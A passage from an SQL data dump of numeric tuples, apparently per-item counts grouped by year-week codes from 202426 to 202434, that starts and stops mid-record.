),(3263,1,'202426',1),(3275,1,'202426',1),(3278,1,'202426',1),(3280,1,'202426',1),(3282,1,'202426',1),(3285,1,'202426',1),(3287,1,'202426',1),(3290,1,'202426',1),(3307,1,'202426',1),(3313,1,'202426',1),(3316,1,'202426',1),(3430,1,'202426',1),(3438,1,'202426',1),(3479,1,'202426',1),(3482,1,'202426',1),(3486,1,'202426',1),(3498,1,'202426',1),(3534,1,'202426',1),(3541,1,'202426',1),(3710,1,'202426',1),(3714,1,'202426',1),(3724,1,'202426',1),(3731,1,'202426',1),(3777,1,'202426',1),(4275,1,'202426',1),(4301,1,'202426',1),(4323,1,'202426',1),(4332,1,'202426',1),(4341,1,'202426',1),(4357,1,'202426',1),(4373,1,'202426',1),(4377,1,'202426',1),(4382,1,'202426',1),(4391,1,'202426',1),(4408,1,'202426',1),(4424,1,'202426',1),(4428,1,'202426',1),(4440,1,'202426',1),(4444,1,'202426',1),(4454,1,'202426',1),(4457,1,'202426',1),(4514,1,'202426',1),(4542,1,'202426',1),(4546,1,'202426',1),(4566,1,'202426',1),(4587,1,'202426',1),(4591,1,'202426',1),(4612,1,'202426',1),(4648,1,'202426',1),(4651,1,'202426',1),(4657,1,'202426',1),(4660,1,'202426',1),(4663,1,'202426',1),(4677,1,'202426',1),(4681,1,'202426',1),(4685,1,'202426',1),(4691,1,'202426',1),(4694,1,'202426',1),(4697,1,'202426',1),(4700,1,'202426',1),(4703,1,'202426',1),(4750,1,'202426',1),(4762,1,'202426',1),(4768,1,'202426',1),(4771,1,'202426',1),(4792,1,'202426',1),(4870,1,'202426',1),(4878,1,'202426',1),(4883,1,'202426',1),(4888,1,'202426',1),(4893,1,'202426',1),(4897,1,'202426',1),(4930,1,'202426',1),(4976,1,'202426',1),(4988,1,'202426',1),(4996,1,'202426',1),(5028,1,'202426',1),(5033,1,'202426',1),(5037,1,'202426',1),(5042,1,'202426',1),(5054,1,'202426',1),(5058,1,'202426',1),(5062,1,'202426',1),(5067,1,'202426',1),(5071,1,'202426',1),(5101,1,'202426',1),(5122,1,'202426',1),(5125,1,'202426',1),(5128,1,'202426',1),(5131,1,'202426',1),(5134,1,'202426',1),(5137,1,'202426',1),(5146,1,'202426',1),(5153,1,'202426',1),(5253,1,'202426',1),(5256,1,'202426',1),(5259,1,'202426',1),(5264,1,'202426',1),(5268,1,'202426',1),(5292,1,'202426',1),(5295,1,'202426',1),(5307,1,'202426',1),(5310,1,'202426',1),(5314,1,'202426',1),(5317,1,'202426',1),(5320,1,'202426',1),(5323,1,'202426',1),(5326,1,'202426',1),(5353,1,'202426',1),(5356,1,'202426',1),(5363,1,'202426',1),(84,1,'202426',2),(108,1,'202426',2),(110,1,'202426',2),(468,1,'202426',2),(473,1,'202426',2),(474,1,'202426',2),(1602,1,'202426',2),(1612,1,'202426',2),(1743,1,'202426',2),(1751,1,'202426',2),(1772,1,'202426',2),(2309,1,'202426',2),(2658,1,'202426',2),(2769,1,'202426',2),(2809,1,'202426',2),(3006,1,'202426',2),(3038,1,'202426',2),(3063,1,'202426',2),(3069,1,'202426',2),(3072,1,'202426',2),(3083,1,'202426',2),(3226,1,'202426',2),(3721,1,'202426',2),(3735,1,'202426',2),(3738,1,'202426',2),(4412,1,'202426',2),(4420,1,'202426',2),(4529,1,'202426',2),(4551,1,'202426',2),(4645,1,'202426',2),(4674,1,'202426',2),(4709,1,'202426',2),(4756,1,'202426',2),(4765,1,'202426',2),(4862,1,'202426',2),(4866,1,'202426',2),(4983,1,'202426',2),(5080,1,'202426',2),(5334,1,'202426',2),(5359,1,'202426',2),(74,1,'202426',3),(1594,1,'202426',3),(1606,1,'202426',3),(1734,1,'202426',3),(2159,1,'202426',3),(2165,1,'202426',3),(2178,1,'202426',3),(2297,1,'202426',3),(2503,1,'202426',3),(2609,1,'202426',3),(2704,1,'202426',3),(2904,1,'202426',3),(3023,1,'202426',3),(3030,1,'202426',3),(3752,1,'202426',3),(4238,1,'202426',3),(4363,1,'202426',3),(4668,1,'202426',3),(5046,1,'202426',3),(5163,1,'202426',3),(479,1,'202426',4),(1544,1,'202426',4),(1770,1,'202426',4),(2152,1,'202426',4),(2293,1,'202426',4),(2965,1,'202426',4),(3004,1,'202426',4),(3005,1,'202426',4),(4329,1,'202426',4),(4797,1,'202426',4),(5050,1,'202426',4),(5076,1,'202426',4),(5140,1,'202426',4),(72,1,'202426',5),(1598,1,'202426',5),(2989,1,'202426',5),(3060,1,'202426',5),(4400,1,'202426',5),(1749,1,'202426',6),(3027,1,'202426',6),(4654,1,'202426',6),(4776,1,'202426',6),(5301,1,'202426',6),(87,1,'202426',7),(1730,1,'202426',7),(3127,1,'202426',7),(3746,1,'202426',7),(3749,1,'202426',7),(3764,1,'202426',7),(4722,1,'202426',7),(5276,1,'202426',7),(89,1,'202426',8),(4338,1,'202426',8),(3781,1,'202426',9),(4520,1,'202426',9),(2148,1,'202426',10),(1586,1,'202426',11),(68,1,'202426',38),(3247,1,'202426',56),(80,1,'202426',58),(9,1,'202426',7750),(91,1,'202427',1),(471,1,'202427',1),(488,1,'202427',1),(1544,1,'202427',1),(1600,1,'202427',1),(1602,1,'202427',1),(1610,1,'202427',1),(1612,1,'202427',1),(1614,1,'202427',1),(1715,1,'202427',1),(1770,1,'202427',1),(2063,1,'202427',1),(2165,1,'202427',1),(2252,1,'202427',1),(2558,1,'202427',1),(2658,1,'202427',1),(2704,1,'202427',1),(2769,1,'202427',1),(2775,1,'202427',1),(2904,1,'202427',1),(2956,1,'202427',1),(2964,1,'202427',1),(3005,1,'202427',1),(3023,1,'202427',1),(3030,1,'202427',1),(3107,1,'202427',1),(3109,1,'202427',1),(3251,1,'202427',1),(3278,1,'202427',1),(3541,1,'202427',1),(3727,1,'202427',1),(3777,1,'202427',1),(4323,1,'202427',1),(4363,1,'202427',1),(4391,1,'202427',1),(4420,1,'202427',1),(4454,1,'202427',1),(4457,1,'202427',1),(4514,1,'202427',1),(4517,1,'202427',1),(4520,1,'202427',1),(4524,1,'202427',1),(4582,1,'202427',1),(4677,1,'202427',1),(4688,1,'202427',1),(4744,1,'202427',1),(4866,1,'202427',1),(5080,1,'202427',1),(5128,1,'202427',1),(5264,1,'202427',1),(5280,1,'202427',1),(5307,1,'202427',1),(5314,1,'202427',1),(570,1,'202427',2),(1588,1,'202427',2),(1598,1,'202427',2),(1724,1,'202427',2),(2309,1,'202427',2),(2503,1,'202427',2),(2809,1,'202427',2),(2813,1,'202427',2),(3004,1,'202427',2),(3027,1,'202427',2),(3060,1,'202427',2),(3249,1,'202427',2),(3282,1,'202427',2),(3482,1,'202427',2),(3534,1,'202427',2),(3771,1,'202427',2),(3774,1,'202427',2),(4238,1,'202427',2),(4416,1,'202427',2),(4551,1,'202427',2),(4612,1,'202427',2),(4663,1,'202427',2),(4674,1,'202427',2),(4759,1,'202427',2),(4983,1,'202427',2),(5037,1,'202427',2),(5076,1,'202427',2),(5137,1,'202427',2),(1582,1,'202427',3),(4722,1,'202427',3),(4776,1,'202427',3),(5125,1,'202427',3),(5326,1,'202427',3),(72,1,'202427',4),(4645,1,'202427',4),(1586,1,'202427',5),(4591,1,'202427',5),(87,1,'202427',6),(1749,1,'202427',6),(3127,1,'202427',6),(3746,1,'202427',6),(5276,1,'202427',6),(3764,1,'202427',7),(1766,1,'202427',8),(3749,1,'202427',8),(2148,1,'202427',11),(3781,1,'202427',12),(3247,1,'202427',17),(68,1,'202427',25),(80,1,'202427',37),(9,1,'202427',6519),(89,1,'202428',1),(110,1,'202428',1),(335,1,'202428',1),(476,1,'202428',1),(1582,1,'202428',1),(1594,1,'202428',1),(1604,1,'202428',1),(1737,1,'202428',1),(2161,1,'202428',1),(2248,1,'202428',1),(2309,1,'202428',1),(2457,1,'202428',1),(2904,1,'202428',1),(2989,1,'202428',1),(3006,1,'202428',1),(3069,1,'202428',1),(3072,1,'202428',1),(3087,1,'202428',1),(3273,1,'202428',1),(3479,1,'202428',1),(4368,1,'202428',1),(4412,1,'202428',1),(4416,1,'202428',1),(4420,1,'202428',1),(4432,1,'202428',1),(4454,1,'202428',1),(4520,1,'202428',1),(4529,1,'202428',1),(4587,1,'202428',1),(4654,1,'202428',1),(4663,1,'202428',1),(4674,1,'202428',1),(4722,1,'202428',1),(5033,1,'202428',1),(5080,1,'202428',1),(5128,1,'202428',1),(5131,1,'202428',1),(5292,1,'202428',1),(5295,1,'202428',1),(5330,1,'202428',1),(5383,1,'202428',1),(478,1,'202428',2),(1544,1,'202428',2),(1588,1,'202428',2),(1592,1,'202428',2),(1720,1,'202428',2),(1732,1,'202428',2),(1770,1,'202428',2),(2165,1,'202428',2),(3023,1,'202428',2),(3249,1,'202428',2),(3287,1,'202428',2),(4363,1,'202428',2),(4551,1,'202428',2),(4591,1,'202428',2),(4776,1,'202428',2),(4996,1,'202428',2),(5157,1,'202428',2),(74,1,'202428',3),(473,1,'202428',3),(1596,1,'202428',3),(1743,1,'202428',3),(5374,1,'202428',3),(72,1,'202428',4),(1598,1,'202428',4),(1778,1,'202428',4),(3749,1,'202428',4),(3781,1,'202428',4),(4382,1,'202428',4),(5076,1,'202428',4),(4338,1,'202428',5),(87,1,'202428',6),(1586,1,'202428',6),(2809,1,'202428',6),(3030,1,'202428',6),(3764,1,'202428',6),(4645,1,'202428',6),(3534,1,'202428',7),(3060,1,'202428',8),(2148,1,'202428',10),(3247,1,'202428',13),(68,1,'202428',36),(80,1,'202428',56),(9,1,'202428',8896),(469,1,'202429',1),(488,1,'202429',1),(1544,1,'202429',1),(1592,1,'202429',1),(1602,1,'202429',1),(1610,1,'202429',1),(1612,1,'202429',1),(1614,1,'202429',1),(1711,1,'202429',1),(1743,1,'202429',1),(1766,1,'202429',1),(2063,1,'202429',1),(2165,1,'202429',1),(2296,1,'202429',1),(2956,1,'202429',1),(3006,1,'202429',1),(3030,1,'202429',1),(3069,1,'202429',1),(3072,1,'202429',1),(3313,1,'202429',1),(3479,1,'202429',1),(3486,1,'202429',1),(4332,1,'202429',1),(4338,1,'202429',1),(4457,1,'202429',1),(4542,1,'202429',1),(4551,1,'202429',1),(4657,1,'202429',1),(4712,1,'202429',1),(4983,1,'202429',1),(5020,1,'202429',1),(5153,1,'202429',1),(5256,1,'202429',1),(5271,1,'202429',1),(5301,1,'202429',1),(5359,1,'202429',1),(72,1,'202429',2),(74,1,'202429',2),(467,1,'202429',2),(1596,1,'202429',2),(1701,1,'202429',2),(1728,1,'202429',2),(1772,1,'202429',2),(1778,1,'202429',2),(2309,1,'202429',2),(2813,1,'202429',2),(2904,1,'202429',2),(3004,1,'202429',2),(3005,1,'202429',2),(3079,1,'202429',2),(3083,1,'202429',2),(3109,1,'202429',2),(3249,1,'202429',2),(3764,1,'202429',2),(3774,1,'202429',2),(4416,1,'202429',2),(4420,1,'202429',2),(4556,1,'202429',2),(4996,1,'202429',2),(5076,1,'202429',2),(5080,1,'202429',2),(5295,1,'202429',2),(5374,1,'202429',2),(89,1,'202429',3),(2154,1,'202429',3),(3781,1,'202429',3),(4771,1,'202429',3),(1594,1,'202429',4),(4341,1,'202429',4),(4694,1,'202429',4),(2457,1,'202429',5),(4412,1,'202429',5),(5163,1,'202429',5),(87,1,'202429',6),(1705,1,'202429',6),(3534,1,'202429',6),(2161,1,'202429',7),(3060,1,'202429',7),(5264,1,'202429',7),(1582,1,'202429',8),(2809,1,'202429',8),(3749,1,'202429',8),(1586,1,'202429',9),(3247,1,'202429',9),(2148,1,'202429',10),(68,1,'202429',33),(80,1,'202429',60),(9,1,'202429',7312),(72,1,'202430',1),(106,1,'202430',1),(468,1,'202430',1),(472,1,'202430',1),(473,1,'202430',1),(474,1,'202430',1),(479,1,'202430',1),(482,1,'202430',1),(1584,1,'202430',1),(1590,1,'202430',1),(1743,1,'202430',1),(1770,1,'202430',1),(2161,1,'202430',1),(2293,1,'202430',1),(2558,1,'202430',1),(2769,1,'202430',1),(3092,1,'202430',1),(3261,1,'202430',1),(3282,1,'202430',1),(3498,1,'202430',1),(3714,1,'202430',1),(3735,1,'202430',1),(4332,1,'202430',1),(4363,1,'202430',1),(4457,1,'202430',1),(4681,1,'202430',1),(4685,1,'202430',1),(4750,1,'202430',1),(5076,1,'202430',1),(5268,1,'202430',1),(5304,1,'202430',1),(5353,1,'202430',1),(89,1,'202430',2),(91,1,'202430',2),(108,1,'202430',2),(335,1,'202430',2),(467,1,'202430',2),(469,1,'202430',2),(1596,1,'202430',2),(1608,1,'202430',2),(1705,1,'202430',2),(2165,1,'202430',2),(2309,1,'202430',2),(2457,1,'202430',2),(2801,1,'202430',2),(2809,1,'202430',2),(2813,1,'202430',2),(3023,1,'202430',2),(3034,1,'202430',2),(3038,1,'202430',2),(3124,1,'202430',2),(3297,1,'202430',2),(3313,1,'202430',2),(3479,1,'202430',2),(3486,1,'202430',2),(3489,1,'202430',2),(3531,1,'202430',2),(3721,1,'202430',2),(3724,1,'202430',2),(3727,1,'202430',2),(3731,1,'202430',2),(3738,1,'202430',2),(3771,1,'202430',2),(3774,1,'202430',2),(4275,1,'202430',2),(4323,1,'202430',2),(4329,1,'202430',2),(4341,1,'202430',2),(4400,1,'202430',2),(4416,1,'202430',2),(4436,1,'202430',2),(4454,1,'202430',2),(4517,1,'202430',2),(4566,1,'202430',2),(4645,1,'202430',2),(4648,1,'202430',2),(4651,1,'202430',2),(4654,1,'202430',2),(4657,1,'202430',2),(4668,1,'202430',2),(4674,1,'202430',2),(4688,1,'202430',2),(4691,1,'202430',2),(4703,1,'202430',2),(4709,1,'202430',2),(4712,1,'202430',2),(4741,1,'202430',2),(4756,1,'202430',2),(4762,1,'202430',2),(4930,1,'202430',2),(4977,1,'202430',2),(4980,1,'202430',2),(4983,1,'202430',2),(4988,1,'202430',2),(5058,1,'202430',2),(5134,1,'202430',2),(5137,1,'202430',2),(5253,1,'202430',2),(5256,1,'202430',2),(5259,1,'202430',2),(5289,1,'202430',2),(5292,1,'202430',2),(5298,1,'202430',2),(5301,1,'202430',2),(5307,1,'202430',2),(5314,1,'202430',2),(5317,1,'202430',2),(5334,1,'202430',2),(5356,1,'202430',2),(5359,1,'202430',2),(74,1,'202430',3),(84,1,'202430',3),(487,1,'202430',3),(1582,1,'202430',3),(1592,1,'202430',3),(2804,1,'202430',3),(2904,1,'202430',3),(3005,1,'202430',3),(3030,1,'202430',3),(3066,1,'202430',3),(3290,1,'202430',3),(3482,1,'202430',3),(4326,1,'202430',3),(4412,1,'202430',3),(4524,1,'202430',3),(4529,1,'202430',3),(4582,1,'202430',3),(4660,1,'202430',3),(4700,1,'202430',3),(4759,1,'202430',3),(4996,1,'202430',3),(5125,1,'202430',3),(5131,1,'202430',3),(5271,1,'202430',3),(5310,1,'202430',3),(102,1,'202430',4),(1594,1,'202430',4),(1600,1,'202430',4),(1728,1,'202430',4),(1772,1,'202430',4),(1778,1,'202430',4),(2503,1,'202430',4),(2956,1,'202430',4),(3060,1,'202430',4),(3069,1,'202430',4),(3764,1,'202430',4),(4335,1,'202430',4),(4377,1,'202430',4),(4694,1,'202430',4),(4744,1,'202430',4),(4765,1,'202430',4),(5046,1,'202430',4),(5128,1,'202430',4),(5320,1,'202430',4),(5374,1,'202430',4),(1602,1,'202430',5),(4420,1,'202430',5),(4706,1,'202430',5),(1544,1,'202430',6),(1598,1,'202430',6),(1610,1,'202430',6),(1697,1,'202430',6),(1703,1,'202430',6),(3109,1,'202430',6),(3263,1,'202430',6),(3430,1,'202430',6),(3749,1,'202430',6),(4776,1,'202430',6),(5295,1,'202430',6),(3127,1,'202430',8),(3247,1,'202430',8),(3534,1,'202430',8),(4747,1,'202430',8),(87,1,'202430',9),(1586,1,'202430',10),(2148,1,'202430',10),(3781,1,'202430',17),(68,1,'202430',42),(80,1,'202430',70),(9,1,'202430',8262),(84,1,'202431',1),(468,1,'202431',1),(473,1,'202431',1),(474,1,'202431',1),(482,1,'202431',1),(487,1,'202431',1),(1602,1,'202431',1),(3004,1,'202431',1),(3045,1,'202431',1),(3066,1,'202431',1),(3083,1,'202431',1),(3313,1,'202431',1),(3714,1,'202431',1),(3738,1,'202431',1),(3752,1,'202431',1),(4520,1,'202431',1),(4566,1,'202431',1),(4608,1,'202431',1),(4668,1,'202431',1),(4674,1,'202431',1),(4688,1,'202431',1),(4691,1,'202431',1),(4700,1,'202431',1),(4703,1,'202431',1),(4712,1,'202431',1),(4741,1,'202431',1),(4750,1,'202431',1),(4759,1,'202431',1),(4762,1,'202431',1),(4768,1,'202431',1),(4776,1,'202431',1),(5137,1,'202431',1),(5259,1,'202431',1),(5271,1,'202431',1),(5301,1,'202431',1),(5304,1,'202431',1),(5334,1,'202431',1),(5356,1,'202431',1),(471,1,'202431',2),(478,1,'202431',2),(570,1,'202431',2),(1590,1,'202431',2),(1695,1,'202431',2),(1697,1,'202431',2),(1701,1,'202431',2),(1703,1,'202431',2),(1705,1,'202431',2),(1707,1,'202431',2),(1709,1,'202431',2),(1711,1,'202431',2),(1713,1,'202431',2),(1715,1,'202431',2),(1718,1,'202431',2),(1720,1,'202431',2),(1722,1,'202431',2),(1724,1,'202431',2),(1726,1,'202431',2),(1728,1,'202431',2),(1734,1,'202431',2),(1737,1,'202431',2),(1739,1,'202431',2),(1741,1,'202431',2),(1743,1,'202431',2),(1747,1,'202431',2),(1749,1,'202431',2),(1751,1,'202431',2),(1766,1,'202431',2),(1768,1,'202431',2),(1772,1,'202431',2),(1776,1,'202431',2),(1782,1,'202431',2),(2063,1,'202431',2),(2150,1,'202431',2),(2152,1,'202431',2),(2154,1,'202431',2),(2156,1,'202431',2),(2159,1,'202431',2),(2178,1,'202431',2),(2248,1,'202431',2),(2296,1,'202431',2),(2297,1,'202431',2),(2457,1,'202431',2),(2748,1,'202431',2),(2751,1,'202431',2),(2775,1,'202431',2),(2904,1,'202431',2),(2964,1,'202431',2),(2989,1,'202431',2),(2991,1,'202431',2),(2993,1,'202431',2),(3023,1,'202431',2),(3079,1,'202431',2),(3092,1,'202431',2),(3102,1,'202431',2),(3104,1,'202431',2),(3107,1,'202431',2),(3229,1,'202431',2),(3240,1,'202431',2),(3243,1,'202431',2),(3245,1,'202431',2),(3249,1,'202431',2),(3251,1,'202431',2),(3253,1,'202431',2),(3257,1,'202431',2),(3259,1,'202431',2),(3261,1,'202431',2),(3265,1,'202431',2),(3267,1,'202431',2),(3269,1,'202431',2),(3271,1,'202431',2),(3273,1,'202431',2),(3278,1,'202431',2),(3280,1,'202431',2),(3282,1,'202431',2),(3285,1,'202431',2),(3297,1,'202431',2),(3777,1,'202431',2),(4338,1,'202431',2),(4373,1,'202431',2),(4377,1,'202431',2),(4382,1,'202431',2),(4391,1,'202431',2),(4408,1,'202431',2),(4424,1,'202431',2),(4428,1,'202431',2),(4432,1,'202431',2),(4440,1,'202431',2),(4444,1,'202431',2),(4448,1,'202431',2),(4524,1,'202431',2),(4546,1,'202431',2),(4556,1,'202431',2),(4677,1,'202431',2),(4681,1,'202431',2),(4697,1,'202431',2),(4792,1,'202431',2),(4797,1,'202431',2),(4802,1,'202431',2),(4858,1,'202431',2),(4862,1,'202431',2),(4870,1,'202431',2),(4874,1,'202431',2),(4878,1,'202431',2),(4883,1,'202431',2),(4888,1,'202431',2),(4893,1,'202431',2),(4897,1,'202431',2),(4983,1,'202431',2),(5020,1,'202431',2),(5024,1,'202431',2),(5028,1,'202431',2),(5037,1,'202431',2),(5042,1,'202431',2),(5050,1,'202431',2),(5054,1,'202431',2),(5058,1,'202431',2),(5071,1,'202431',2),(5080,1,'202431',2),(5128,1,'202431',2),(5140,1,'202431',2),(5146,1,'202431',2),(5157,1,'202431',2),(5248,1,'202431',2),(5264,1,'202431',2),(5268,1,'202431',2),(5310,1,'202431',2),(5326,1,'202431',2),(5363,1,'202431',2),(5378,1,'202431',2),(5383,1,'202431',2),(1594,1,'202431',3),(1610,1,'202431',3),(1774,1,'202431',3),(1778,1,'202431',3),(1780,1,'202431',3),(2161,1,'202431',3),(2165,1,'202431',3),(2658,1,'202431',3),(3226,1,'202431',3),(4387,1,'202431',3),(4404,1,'202431',3),(4436,1,'202431',3),(4645,1,'202431',3),(5062,1,'202431',3),(5067,1,'202431',3),(5153,1,'202431',3),(89,1,'202431',4),(469,1,'202431',4),(470,1,'202431',4),(1582,1,'202431',4),(1699,1,'202431',4),(1745,1,'202431',4),(1770,1,'202431',4),(2252,1,'202431',4),(2293,1,'202431',4),(2309,1,'202431',4),(2609,1,'202431',4),(3275,1,'202431',4),(3287,1,'202431',4),(3290,1,'202431',4),(3541,1,'202431',4),(4238,1,'202431',4),(4357,1,'202431',4),(4368,1,'202431',4),(4396,1,'202431',4),(4591,1,'202431',4),(4660,1,'202431',4),(4771,1,'202431',4),(4866,1,'202431',4),(5046,1,'202431',4),(5076,1,'202431',4),(5330,1,'202431',4),(5374,1,'202431',4),(1598,1,'202431',5),(2769,1,'202431',5),(3060,1,'202431',5),(3096,1,'202431',5),(3764,1,'202431',5),(4412,1,'202431',5),(4416,1,'202431',5),(87,1,'202431',6),(1544,1,'202431',6),(1596,1,'202431',6),(3069,1,'202431',6),(3109,1,'202431',6),(3534,1,'202431',6),(3749,1,'202431',6),(4363,1,'202431',6),(4542,1,'202431',6),(1586,1,'202431',7),(3781,1,'202431',7),(4612,1,'202431',7),(3263,1,'202431',8),(4420,1,'202431',8),(4587,1,'202431',8),(4765,1,'202431',8),(2965,1,'202431',9),(2148,1,'202431',12),(3247,1,'202431',12),(68,1,'202431',38),(80,1,'202431',71),(9,1,'202431',9851),(74,1,'202432',1),(76,1,'202432',1),(84,1,'202432',1),(89,1,'202432',1),(110,1,'202432',1),(467,1,'202432',1),(473,1,'202432',1),(1598,1,'202432',1),(1604,1,'202432',1),(1718,1,'202432',1),(1724,1,'202432',1),(1743,1,'202432',1),(1770,1,'202432',1),(1780,1,'202432',1),(2156,1,'202432',1),(2165,1,'202432',1),(2609,1,'202432',1),(2904,1,'202432',1),(2911,1,'202432',1),(3027,1,'202432',1),(3096,1,'202432',1),(3124,1,'202432',1),(3245,1,'202432',1),(3257,1,'202432',1),(3261,1,'202432',1),(3498,1,'202432',1),(3714,1,'202432',1),(4338,1,'202432',1),(4363,1,'202432',1),(4412,1,'202432',1),(4440,1,'202432',1),(4448,1,'202432',1),(4457,1,'202432',1),(4529,1,'202432',1),(4608,1,'202432',1),(4654,1,'202432',1),(4660,1,'202432',1),(4681,1,'202432',1),(4685,1,'202432',1),(4750,1,'202432',1),(4768,1,'202432',1),(4858,1,'202432',1),(4897,1,'202432',1),(4988,1,'202432',1),(5037,1,'202432',1),(5067,1,'202432',1),(5080,1,'202432',1),(5137,1,'202432',1),(5153,1,'202432',1),(5271,1,'202432',1),(5276,1,'202432',1),(5280,1,'202432',1),(5304,1,'202432',1),(5307,1,'202432',1),(5314,1,'202432',1),(5320,1,'202432',1),(5326,1,'202432',1),(72,1,'202432',2),(87,1,'202432',2),(468,1,'202432',2),(472,1,'202432',2),(477,1,'202432',2),(480,1,'202432',2),(486,1,'202432',2),(487,1,'202432',2),(1586,1,'202432',2),(1588,1,'202432',2),(1590,1,'202432',2),(1592,1,'202432',2),(1594,1,'202432',2),(1600,1,'202432',2),(1602,1,'202432',2),(1606,1,'202432',2),(1608,1,'202432',2),(1720,1,'202432',2),(1772,1,'202432',2),(2063,1,'202432',2),(2178,1,'202432',2),(2309,1,'202432',2),(2769,1,'202432',2),(2801,1,'202432',2),(2804,1,'202432',2),(2965,1,'202432',2),(3069,1,'202432',2),(3087,1,'202432',2),(3226,1,'202432',2),(3243,1,'202432',2),(3275,1,'202432',2),(3307,1,'202432',2),(3479,1,'202432',2),(3531,1,'202432',2),(3534,1,'202432',2),(3735,1,'202432',2),(3746,1,'202432',2),(3771,1,'202432',2),(4301,1,'202432',2),(4326,1,'202432',2),(4332,1,'202432',2),(4357,1,'202432',2),(4377,1,'202432',2),(4391,1,'202432',2),(4396,1,'202432',2),(4542,1,'202432',2),(4587,1,'202432',2),(4657,1,'202432',2),(4722,1,'202432',2),(4759,1,'202432',2),(4776,1,'202432',2),(4976,1,'202432',2),(4996,1,'202432',2),(5071,1,'202432',2),(5101,1,'202432',2),(5128,1,'202432',2),(5264,1,'202432',2),(5356,1,'202432',2),(5359,1,'202432',2),(5374,1,'202432',2),(335,1,'202432',3),(481,1,'202432',3),(483,1,'202432',3),(1728,1,'202432',3),(2152,1,'202432',3),(2154,1,'202432',3),(2161,1,'202432',3),(2457,1,'202432',3),(3005,1,'202432',3),(3285,1,'202432',3),(4432,1,'202432',3),(4677,1,'202432',3),(4930,1,'202432',3),(5024,1,'202432',3),(5076,1,'202432',3),(5125,1,'202432',3),(5131,1,'202432',3),(91,1,'202432',4),(482,1,'202432',4),(1544,1,'202432',4),(1699,1,'202432',4),(1732,1,'202432',4),(1749,1,'202432',4),(2293,1,'202432',4),(2617,1,'202432',4),(3092,1,'202432',4),(3263,1,'202432',4),(3297,1,'202432',4),(4335,1,'202432',4),(4368,1,'202432',4),(4546,1,'202432',4),(4582,1,'202432',4),(4663,1,'202432',4),(4771,1,'202432',4),(4893,1,'202432',4),(5146,1,'202432',4),(5330,1,'202432',4),(479,1,'202432',5),(1776,1,'202432',5),(2503,1,'202432',5),(2964,1,'202432',5),(3104,1,'202432',5),(3287,1,'202432',5),(3781,1,'202432',5),(4444,1,'202432',5),(4983,1,'202432',5),(5353,1,'202432',5),(1774,1,'202432',6),(3749,1,'202432',6),(5140,1,'202432',6),(1582,1,'202432',7),(3247,1,'202432',7),(3482,1,'202432',7),(4416,1,'202432',7),(2775,1,'202432',8),(3541,1,'202432',8),(5054,1,'202432',8),(3764,1,'202432',9),(3060,1,'202432',10),(2148,1,'202432',11),(4420,1,'202432',12),(68,1,'202432',31),(80,1,'202432',40),(9,1,'202432',18107),(74,1,'202433',1),(480,1,'202433',1),(1747,1,'202433',1),(1749,1,'202433',1),(2154,1,'202433',1),(2178,1,'202433',1),(2751,1,'202433',1),(2809,1,'202433',1),(2993,1,'202433',1),(3034,1,'202433',1),(3079,1,'202433',1),(3104,1,'202433',1),(3240,1,'202433',1),(3249,1,'202433',1),(3263,1,'202433',1),(3275,1,'202433',1),(3280,1,'202433',1),(3430,1,'202433',1),(3438,1,'202433',1),(3710,1,'202433',1),(3727,1,'202433',1),(3764,1,'202433',1),(4332,1,'202433',1),(4424,1,'202433',1),(4444,1,'202433',1),(4514,1,'202433',1),(4524,1,'202433',1),(4608,1,'202433',1),(4645,1,'202433',1),(4651,1,'202433',1),(4657,1,'202433',1),(4668,1,'202433',1),(4674,1,'202433',1),(4792,1,'202433',1),(4862,1,'202433',1),(4888,1,'202433',1),(4977,1,'202433',1),(4980,1,'202433',1),(5050,1,'202433',1),(5058,1,'202433',1),(5080,1,'202433',1),(5128,1,'202433',1),(5137,1,'202433',1),(5276,1,'202433',1),(5301,1,'202433',1),(5317,1,'202433',1),(76,1,'202433',2),(102,1,'202433',2),(472,1,'202433',2),(473,1,'202433',2),(477,1,'202433',2),(484,1,'202433',2),(487,1,'202433',2),(1614,1,'202433',2),(1705,1,'202433',2),(1713,1,'202433',2),(1737,1,'202433',2),(1768,1,'202433',2),(1776,1,'202433',2),(2152,1,'202433',2),(2248,1,'202433',2),(2297,1,'202433',2),(2309,1,'202433',2),(2617,1,'202433',2),(2813,1,'202433',2),(2991,1,'202433',2),(3005,1,'202433',2),(3030,1,'202433',2),(3273,1,'202433',2),(3278,1,'202433',2),(3290,1,'202433',2),(4454,1,'202433',2),(4457,1,'202433',2),(4551,1,'202433',2),(4654,1,'202433',2),(4663,1,'202433',2),(4706,1,'202433',2),(4750,1,'202433',2),(4765,1,'202433',2),(5076,1,'202433',2),(5163,1,'202433',2),(5256,1,'202433',2),(72,1,'202433',3),(479,1,'202433',3),(1590,1,'202433',3),(1600,1,'202433',3),(1602,1,'202433',3),(1711,1,'202433',3),(1728,1,'202433',3),(2904,1,'202433',3),(3117,1,'202433',3),(3489,1,'202433',3),(4416,1,'202433',3),(4691,1,'202433',3),(4893,1,'202433',3),(5353,1,'202433',3),(478,1,'202433',4),(1586,1,'202433',4),(1743,1,'202433',4),(2804,1,'202433',4),(3038,1,'202433',4),(3092,1,'202433',4),(4323,1,'202433',4),(4700,1,'202433',4),(4712,1,'202433',4),(5037,1,'202433',4),(5122,1,'202433',4),(5131,1,'202433',4),(1544,1,'202433',5),(1730,1,'202433',5),(4420,1,'202433',5),(4566,1,'202433',5),(1582,1,'202433',6),(4709,1,'202433',6),(3721,1,'202433',7),(3781,1,'202433',8),(2148,1,'202433',13),(3247,1,'202433',13),(68,1,'202433',41),(3060,1,'202433',42),(80,1,'202433',50),(9,1,'202433',12159),(76,1,'202434',1),(84,1,'202434',1),(87,1,'202434',1),(91,1,'202434',1),(106,1,'202434',1),(467,1,'202434',1),(472,1,'202434',1),(473,1,'202434',1),(474,1,'202434',1),(478,1,'202434',1),(480,1,'202434',1),(1584,1,'202434',1),(1604,1,'202434',1),(1606,1,'202434',1),(1612,1,'202434',1),(1699,1,'202434',1),(1703,1,'202434',1),(1705,1,'202434',1),(1709,1,'202434',1),(1713,1,'202434',1),(1720,1,'202434',1),(1722,1,'202434',1),(1724,1,'202434',1),(1726,1,'202434',1),(1728,1,'202434',1),(1732,1,'202434',1),(1745,1,'202434',1),(1747,1,'202434',1),(1768,1,'202434',1),(1778,1,'202434',1),(1780,1,'202434',1),(1782,1,'202434',1),(2152,1,'202434',1),(2154,1,'202434',1),(2156,1,'202434',1),(2159,1,'202434',1),(2248,1,'202434',1),(2293,1,'202434',1),(2296,1,'202434',1),(2297,1,'202434',1),(2751,1,'202434',1),(2801,1,'202434',1),(2804,1,'202434',1),(2809,1,'202434',1),(2956,1,'202434',1),(2993,1,'202434',1),(3027,1,'202434',1),(3034,